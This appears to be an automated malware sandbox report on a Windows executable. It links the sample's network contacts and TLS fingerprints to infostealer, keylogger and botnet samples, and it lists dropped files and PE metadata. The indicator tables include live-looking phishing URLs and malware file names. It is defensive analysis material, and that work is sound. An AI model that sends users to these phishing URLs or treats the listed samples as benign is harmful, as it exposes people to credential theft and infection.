	random.exe	Get hash	malicious	Unknown	Browse	157.240.0.35
	random.exe	Get hash	malicious	Unknown	Browse	157.240.253.35
	Endermanch@MEMZ.exe	Get hash	malicious	Bdaejec, KillMBR	Browse	157.240.251.35
	http://att-108796-103800.weeblysite.com/	Get hash	malicious	Unknown	Browse	157.240.251.35
	http://telstra-107506.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	157.240.0.35
	http://meteamaskxlogen.gitbook.io/	Get hash	malicious	Unknown	Browse	157.240.252.35
	https://erratic-mellow-comte.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	157.240.0.35
	http://telstra-107152.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	157.240.251.35
twitter.com	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	104.244.42.193
	file.exe	Get hash	malicious	Babadeda	Browse	104.244.42.1
	random.exe	Get hash	malicious	Unknown	Browse	104.244.42.1
	random.exe	Get hash	malicious	Unknown	Browse	104.244.42.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Babadeda	Browse	23.200.0.9
	file.exe	Get hash	malicious	Babadeda	Browse	23.200.0.42
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	23.219.161.132
	N#U00b0025498563-.pdf	Get hash	malicious	Unknown	Browse	2.16.241.15
	http://leostop.com	Get hash	malicious	Unknown	Browse	172.232.31.180
	file.exe	Get hash	malicious	Babadeda	Browse	23.219.161.132
	file.exe	Get hash	malicious	Babadeda	Browse	23.219.161.141
	file.exe	Get hash	malicious	Babadeda	Browse	23.200.0.9
	My Info Tech Partner Executed Agreement Docs#071999(Revised).pdf	Get hash	malicious	HTMLPhisher	Browse	2.16.238.152
	7Y18r(215).exe	Get hash	malicious	Unknown	Browse	172.234.222.143
CLOUDFLARENETUS	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://forms.office.com/r/xULzprLcwH	Get hash	malicious	Unknown	Browse	104.18.94.41
	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://r.emails.wellbeingontheweb.com/mk/cl/f/sh/7nVU1aA2nfuMScRuip3UF1TWed6PxdT/DQvTpig-WhJj	Get hash	malicious	Unknown	Browse	104.17.25.14
	Quotation.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	invoice.docx.doc	Get hash	malicious	FormBook	Browse	188.114.96.3
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.au	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Babadeda	Browse	94.245.104.56
	file.exe	Get hash	malicious	Babadeda	Browse	94.245.104.56
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	204.79.197.237
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	94.245.104.56
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	20.96.153.111
	6Vm1Ii4ASz.exe	Get hash	malicious	Babadeda	Browse	94.245.104.56
	xd.mips.elf	Get hash	malicious	Mirai	Browse	104.40.77.27
	file.exe	Get hash	malicious	Babadeda	Browse	20.96.153.111
	file.exe	Get hash	malicious	Babadeda	Browse	20.96.153.111
	ewdWlNc8TL.exe	Get hash	malicious	Tofsee	Browse	52.101.8.49
GES-ASRU	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	85.28.47.31
	Jzu7V2qdJx.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.70
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	Babadeda	Browse	173.222.162.64
	file.exe	Get hash	malicious	Babadeda	Browse	173.222.162.64
	http://cs9.biz	Get hash	malicious	Unknown	Browse	173.222.162.64
	file.exe	Get hash	malicious	Babadeda	Browse	173.222.162.64
	7Y18r(169).exe	Get hash	malicious	CryptOne	Browse	173.222.162.64
	EB34B4827C25A458359FE317D886E56C7B3C75A140DCD57D604FC093A9AA2B2C.exe	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://wheelindia.in/fipol/DKB_new/	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://att-108796-103800.weeblysite.com/	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://telstra-107506.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	http://clodh-4716.obcuaclze.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Babadeda	Browse	40.126.32.68 184.28.90.27
	https://forms.office.com/r/xULzprLcwH	Get hash	malicious	Unknown	Browse	40.126.32.68 184.28.90.27
	file.exe	Get hash	malicious	Babadeda	Browse	40.126.32.68 184.28.90.27
	https://r.emails.wellbeingontheweb.com/mk/cl/f/sh/7nVU1aA2nfuMScRuip3UF1TWed6PxdT/DQvTpig-WhJj	Get hash	malicious	Unknown	Browse	40.126.32.68 184.28.90.27
	http://cs9.biz	Get hash	malicious	Unknown	Browse	40.126.32.68 184.28.90.27
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	40.126.32.68 184.28.90.27
	https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.au	Get hash	malicious	HTMLPhisher	Browse	40.126.32.68 184.28.90.27
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	40.126.32.68 184.28.90.27
	zKXXNr7f2e.exe	Get hash	malicious	Babadeda	Browse	40.126.32.68 184.28.90.27
	http://baghoorg.xyz	Get hash	malicious	Unknown	Browse	40.126.32.68 184.28.90.27
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Trojan.PackedNET.738.1574.9831.exe	Get hash	malicious	AgentTesla	Browse	40.113.110.67 40.115.3.253
	http://cs9.biz	Get hash	malicious	Unknown	Browse	40.113.110.67 40.115.3.253
	https://cloudflare-ipfs.com/ipfs/QmZe2ELun5aFwHyi9wE3DpfuUQM8RqExLq66jv64aV8BQd/#info@royaletruckservices.com.au	Get hash	malicious	HTMLPhisher	Browse	40.113.110.67 40.115.3.253
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	40.113.110.67 40.115.3.253
	ynhHNexysa.exe	Get hash	malicious	AgentTesla	Browse	40.113.110.67 40.115.3.253
	7Y18r(191).exe	Get hash	malicious	Unknown	Browse	40.113.110.67 40.115.3.253
	7Y18r(169).exe	Get hash	malicious	CryptOne	Browse	40.113.110.67 40.115.3.253
	7Y18r(191).exe	Get hash	malicious	Unknown	Browse	40.113.110.67 40.115.3.253
	xptRc4P9NV.exe	Get hash	malicious	Unknown	Browse	40.113.110.67 40.115.3.253
	fps-booster.exe	Get hash	malicious	StormKitty	Browse	40.113.110.67 40.115.3.253
a0e9f5d64349fb13191bc781f81f42e1	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.208.16.95
	TBw6qwEBHZ.exe	Get hash	malicious	BlackMoon, Neshta, XRed	Browse	104.208.16.95
	C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe	Get hash	malicious	Bdaejec, BitCoin Miner, Xmrig	Browse	104.208.16.95
	imT9J3SEaZ.exe	Get hash	malicious	Unknown	Browse	104.208.16.95
	FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exe	Get hash	malicious	Bdaejec	Browse	104.208.16.95
	LisectAVT_2403002A_156.exe	Get hash	malicious	XRed	Browse	104.208.16.95
	LisectAVT_2403002A_160.exe	Get hash	malicious	Gh0stCringe, GhostRat, Mimikatz, RunningRAT, XRed	Browse	104.208.16.95
	LisectAVT_2403002A_156.exe	Get hash	malicious	XRed	Browse	104.208.16.95
	LisectAVT_2403002A_173.exe	Get hash	malicious	Unknown	Browse	104.208.16.95
	LisectAVT_2403002A_173.exe	Get hash	malicious	Unknown	Browse	104.208.16.95

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse
	azeyNF3kkf.exe	Get hash	malicious	Stealc, Vidar	Browse
	Setup .exe	Get hash	malicious	Go Injector, MicroClip, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9710195258735785
Encrypted:	false
SSDEEP:	192:aydQw0a0UuZyjpCZrMZtzuiF1Z24IO8/:Jaw0hUuZyjrTzuiF1Y4IO8/
MD5:	A0CA59F198CA21127C45C331E5844820
SHA1:	D6E92B47DFFC2D1F092348DE4163FEF3E99AE42A
SHA-256:	6484308939F210DC31591EF2D1B49DE49752C101B98AAC674AD9E6EBDC0031E6
SHA-512:	E32D1FA63CF45FC8B59226C83235EEA5997ECB0A40F32B5B1FD01770B16848775F95599F79FC2FC56D094764E7E7C14E69EFBDB6B13F70A3A9935B36DFCD69B5
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.5.6.6.2.9.4.0.7.8.9.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.5.6.6.2.9.8.7.8.5.4.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.3.3.f.0.f.-.1.7.d.6.-.4.9.5.2.-.9.e.9.0.-.3.0.4.4.7.4.d.8.9.0.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.d.5.f.b.c.0.-.9.e.2.4.-.4.8.0.6.-.b.f.a.1.-.7.a.6.a.b.a.0.7.9.3.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.c.a.3.2.3.9.8.c.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.c.-.0.0.0.1.-.0.0.1.5.-.d.d.5.f.-.4.4.f.f.3.6.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.f.3.a.e.b.7.2.a.7.5.d.a.0.f.4.5.b.c.5.1.d.7.d.3.c.1.6.a.8.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.6.c.3.0.9.2.5.5.f.2.e.7.0.1.f.8.3.2.5.c.0.b.a.2.e.b.a.8.f.e.2.7.0.c.3.2.e.4.4.a.!.7.c.a.3.2.3.9.8.c.d...e.x.e.....T.a.r.g.e.t.A.p.p.

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	7731
Entropy (8bit):	5.167997136161747
Encrypted:	false
SSDEEP:	192:IOBMXGgzcbhbVbTbfbRbObtbyEl7nOJA6unSrDtTkdxSofS:IOiDcNhnzFSJN1nSrDhkdxm
MD5:	92FD9F79F58F069932A71DEA57D2BA36
SHA1:	FC99C16259AB09CEDBF94E8DC6F4258F19CA2298
SHA-256:	EA04842EE67C99F397256AE3B72A83D891E804A7E73A221B93DE4362DC8C4188
SHA-512:	1BD271C05B4C4C8E78B9F8A3D278BAB89F2C1B0999472DC1A840710BF1EF31FE96917FA1E349D2153E7797D7C1129F8E17E07D1DFBBCAF99123F2A7D49C2EF1B
Malicious:	false
Preview:	{"type":"uninstall","id":"0050b7db-8e21-483e-bc3d-b92cf27b27cd","creationDate":"2024-07-26T10:23:13.936Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"7340e351-fad3-4a0f-b554-971fbfafe8fb","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44898
Entropy (8bit):	6.094854921438039
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWISi1zNtgYUGUH7NDf5GpxQwnKJDSgzMMd6qD47u3S:+/Ps+wsI7ynE+m7+nKtSmd6qE7lFoC
MD5:	6B19A9BFB3AC591D45685F639AB55842
SHA1:	EE583C548F81D43FD528C0787E30615100E25DCB
SHA-256:	36BE978436BF27F0FFFEDECE92139DAC165AF30636B44E4CBC827D0D8CA33537
SHA-512:	C77CDDDD87C4E9F0F2428864327BD5A47CD54F480A299D46AE7D8DFCCCD14876D99E88142B08C33C337E76BA5612BA72479E12DF06C6EFD908F580F9D3BA2A2A
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3870)
Category:	dropped
Size (bytes):	19255
Entropy (8bit):	5.364867158179471
Encrypted:	false
SSDEEP:	384:HRkXOVgC/VLdRG6GBSm7FWiKaOOm9+4QXTHYkmwVYTP:HF/VLdR78Ka7c+RXEkmwVmP
MD5:	6FBAE595D6B4E51116DF0CD2C8E84800
SHA1:	A4FFFF9BD93F25472A2113F43166BF9720973214
SHA-256:	D668BAC6FC08E608CF3C658FA28675D214E7CFEB8D50D01AD3B9E9DAD740AE04
SHA-512:	7FDB4D20C820D2E62C9AA3E68F48823C3B9F0C4D4E32426E6DECAB6D706BEE4B17242F7179CCB69F27A5D8B8DB02D8924C876945CDE6C10BBA29DF7E110C138F
Malicious:	false
Preview:	"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;.try{.var QDa=_.ea.URL,RDa,SDa,UDa,TDa;try{new QDa("http://example.com"),RDa=!0}catch(a){RDa=!1}SDa=RDa;.UDa=function(a){var b=_.qh("A");try{_.tb(b,new _.eb(a));var c=b.protocol}catch(e){throw Error("tc`"+a);}if(c===""\|\|c===":"\|\|c[c.length-1]!=":")throw Error("tc`"+a);if(!TDa.has(c))throw Error("tc`"+a);if(!b.hostname)throw Error("tc`"+a);var d=b.href;a={href:d,protocol:b.protocol,username:"",password:"",hostname:b.hostname,pathname:"/"+b.pathname,search:b.search,hash:b.hash,toString:function(){return d}};TDa.get(b.protocol)===b.port?(a.host=a.hostname,a.port="",a.origin=a.protocol+"//"+a.hostname):.(a.host=b.host,a.port=b.port,a.origin=a.protocol+"//"+a.hostname+":"+a.port);return a};._.VDa=function(a){if(SDa){try{var b=new QDa(a)}catch(d){throw Error("tc`"+a);}var c=TDa.get(b.protocol);if(!c)throw Error("tc`"+a);if(!b.hostname)throw Error("tc`"+a);b.origin=="null"&&(a={href:b.hre

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.12196004855163
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	253'952 bytes
MD5:	d3ce34e9bb2a33ab3d637e75af2a8bb8
SHA1:	6c309255f2e701f8325c0ba2eba8fe270c32e44a
SHA256:	8c207b724ee5d0febaa25aadf3861b31e3740412da99dfd53e5518db47082312
SHA512:	fdea0ce0da180d2bc06234ec427226fd39a4a16fea23fe527c0b88a9f552cbf9e70885c5f91a35bd8fc78b72266c8fd702ef77404c350f96232d6cc321de382a
SSDEEP:	3072:6HXfJmQUzKqHjuplWvBspz5phUjbc3kej1HW9UZgBhTARop+Ps1fZAgT2:QPJmQUzKFesXMbaL12D1ArsnAgT
TLSH:	0744BE10BA94D436DDA355348CB8D2F5263B7C938B64998F77583F2F3D72281AA21372
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............j}......jH......j\|......dE..............jy......jL......jK.....Rich....................PE..L......c...........

Entrypoint:	0x40205c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63DB0FC1 [Thu Feb 2 01:20:01 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3c4625b089724a866beb99a0245cb276

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x258b4	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2048000	0xd7f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25918	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x25380	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x219c0	0x21a00	f2232e7a5e02600fa4f853092e575387	False	0.8959616054832714	data	7.823583257358654	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x3258	0x3400	3f23e393345c988e7b3f6cbca3ae0e2d	False	0.3486328125	data	4.922670555755531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x27000	0x202098c	0xb600	07f151b179928f3c4d4372d2a1a3126d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2048000	0xd7f0	0xd800	aed658982594f576ab1b0bf8bbec9519	False	0.3402777777777778	data	4.368021567220366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x204eea8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x204fd50	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x20505f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_CURSOR	0x2050b90	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x2050cc0	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x2050d98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x2051c40	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x20524e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x2052a80	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x2053928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x20541d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x2048630	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.4698827292110874
RT_ICON	0x2048630	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.4698827292110874
RT_ICON	0x20494d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5852888086642599
RT_ICON	0x20494d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5852888086642599
RT_ICON	0x2049d80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6497695852534562
RT_ICON	0x2049d80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6497695852534562
RT_ICON	0x204a448	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.7044797687861272
RT_ICON	0x204a448	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.7044797687861272
RT_ICON	0x204a9b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3699170124481328
RT_ICON	0x204a9b0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3699170124481328
RT_ICON	0x204cf58	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.46318011257035646
RT_ICON	0x204cf58	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.46318011257035646
RT_ICON	0x204e000	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5422131147540984
RT_ICON	0x204e000	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5422131147540984
RT_ICON	0x204e988	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6365248226950354
RT_ICON	0x204e988	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6365248226950354
RT_STRING	0x20549c8	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x20549c8	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x2054e20	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x2054e20	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x20550b0	0x73e	data	Tamil	India	0.4261057173678533
RT_STRING	0x20550b0	0x73e	data	Tamil	Sri Lanka	0.4261057173678533
RT_ACCELERATOR	0x204ee68	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x204ee68	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x2050b60	0x30	data			0.9375
RT_GROUP_CURSOR	0x2050d70	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x2052a50	0x30	data			0.9375
RT_GROUP_CURSOR	0x2054738	0x30	data			0.9375
RT_GROUP_ICON	0x204edf0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x204edf0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_VERSION	0x2054768	0x25c	data			0.5331125827814569

DLL	Import
